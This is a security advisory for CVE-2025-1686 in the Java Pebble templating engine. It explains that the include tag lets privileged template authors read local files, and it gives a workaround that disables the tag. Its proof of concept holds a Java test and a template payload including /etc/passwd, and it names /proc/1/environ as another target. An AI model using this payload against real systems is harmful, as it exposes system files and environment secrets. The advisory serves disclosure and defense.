External Control of File Name or Path Affecting io.pebbletemplates:pebble package, versions [0,]
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JAVA-IOPEBBLETEMPLATES-8745594
- published25 Feb 2025
- disclosed24 Feb 2025
- creditJonathan Leitschuh
Introduced: 24 Feb 2025
NewCVE-2025-1686 (opens in a new tab)How to fix?
There is no fixed version for io.pebbletemplates:pebble.
Overview
io.pebbletemplates:pebble is a java templating engine inspired by Twig.
Affected versions of this package are vulnerable to External Control of File Name or Path via the include tag. A high privileged attacker can access sensitive local files by crafting malicious notification templates that leverage this tag to include files like /etc/passwd or /proc/1/environ.
Workaround
This vulnerability can be mitigated by disabling the include macro in Pebble Templates:
new PebbleEngine.Builder()
.registerExtensionCustomizer(new DisallowExtensionCustomizerBuilder()
.disallowedTokenParserTags(List.of("include"))
.build())
.build();
PoC
The following test demonstrates the vulnerability:
PebbleEngine e = new PebbleEngine.Builder().build();String templateString = """ {% include '/etc/passwd' %} """; PebbleTemplate template = e.getLiteralTemplate(templateString);
try (final Writer writer = new StringWriter()) { template.evaluate(writer, new HashMap<>()); System.out.println(writer); }
As an attacker, the following malicious template demonstrates the vulnerability:
{% include '/etc/passwd' %}